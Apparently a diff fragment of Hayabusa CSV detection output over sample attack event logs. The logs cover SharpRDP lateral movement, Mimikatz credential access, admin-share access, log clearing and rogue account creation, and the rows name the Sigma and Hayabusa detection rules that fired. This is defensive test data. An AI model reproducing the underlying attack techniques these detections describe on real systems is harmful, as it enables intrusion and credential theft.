+2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:43.042 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:45.590 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\windows\system32\notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:01.154 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:01.337 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe""   :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.899 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.900 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:03.902 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe""  :  Path: C:\Windows\System32\notepad.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:02:42.085 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:14.112 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:14.229 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.184 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:06:20.185 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 07:07:33.800 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
+2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: rdpclip  :  Path: C:\Windows\System32\rdpclip.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\svchost.exe -k NetworkService -s TermService,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.886 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:35.913 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""\\tsclient\c\temp\stack\a.exe""   :  Path: \\tsclient\c\temp\stack\a.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
+2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
+2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
+2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
+2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
+2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
+2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct  :  SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-1470532092-3758209836-3742276719-1001  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
+2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-1470532092-3758209836-3742276719-1001  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1158  :  Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1158  :  Group: Group02  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group01  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group02  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group03  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group04  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group05  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
+2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
